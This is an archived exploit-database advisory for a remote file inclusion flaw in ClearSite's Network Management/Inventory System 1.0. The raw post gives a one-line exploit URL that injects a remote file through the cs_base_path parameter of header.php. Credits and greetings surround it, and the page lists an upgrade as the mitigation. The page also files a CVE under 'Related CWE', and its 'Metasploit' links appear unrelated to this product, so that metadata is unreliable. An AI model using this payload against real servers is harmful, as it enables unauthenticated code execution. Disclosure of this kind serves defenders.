Network Management/Inventory System [header.php] Remote File Include Vulnerability

vendor:

Network Management/Inventory System

by:

EA Ngel

9.3

CVSS

HIGH

Network Management/Inventory System Remote File Include Vulnerability

CWE

Product Name: Network Management/Inventory System

Affected Version From: 1

Affected Version To: 1

Patch Exists: YES

Related CWE: CVE-2009-4010

CPE: a:clearsite:network_management_inventory_system:1.0

Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-4010/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4010/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2009

Network Management/Inventory System [header.php] Remote File Include Vulnerability

This vulnerability allows remote attackers to execute arbitrary PHP code on vulnerable installations of Network Management/Inventory System. Authentication is not required to exploit this vulnerability.

Mitigation:

Upgrade to version 1.0.1 or higher.

Source

Exploit-DB raw data:

              [#]Network Management/Inventory System [header.php] Remote File Include Vulnerability[#]
                 ----------------------------------------------------------------------------------



[@]======================================================================================================[@]
[+] Author	 	 : EA Ngel									 [+]
[+] Location    	 : Republik Rakyat Indonesia [RRI]						 [+]
[+] Situs          	 : www[dot]manadocoding[dot]net						    	 [+]					
[+] Contact        	 : engelpemula[at]gmail[dot]com							 [+]
[+] Download Script	 : http://sourceforge.net/projects/clearsite/					 [+]	
[@]======================================================================================================[@]



[@]======================================================================================================[@]
[+] 3rr0r Bu9		 : - header.php									 [+]								
[@]======================================================================================================[@]



[@]======================================================================================================[@]
[+] 3xpl0it		 : http://127.0.0.1/include/header.php?cs_base_path=[thanks.txt?]		 [+]
[@]======================================================================================================[@]



[@]======================================================================================================[@]
[+] Sp3ci4l Th4nks  	 : str0ke > basix > cr4wl3r > kamuiclone > Mr.C > steve_duma > cokiki > cyberlog [+] 
[+]                        angky_tatoki > doniskynet > rezagmas > g4pt3k > my_wisdom > hmei7 > k3nz0     [+]
[+]		           wishnu > bl4ck_3n91n3 > Mr.Crossbeam > kiddies > yadiyauri > zpy > moon_lee   [+]
[+]		           c6 > and friends                                                              [+]
[@]======================================================================================================[@]



[@]======================================================================================================[@]
[+] Greetz t00		 : All crew ManadoCoding [manadocoding.net]                                      [+]          
[+]                                                                                             	 [+]
[+]                        All Crew SekuritiOnline [sekuritionline.net]					 [+]
[@]======================================================================================================[@]


[@]======================================================================================================[@]
[+] Note		 : Anxiety in a man's heart weighs it down, but an encouraging word makes it glad[+]
[+]                        (Proverbs 12:25)                                                              [+]             
[@]======================================================================================================[@]

			 	           * GOD BLESS ALL *

# milw0rm.com [2009-09-18]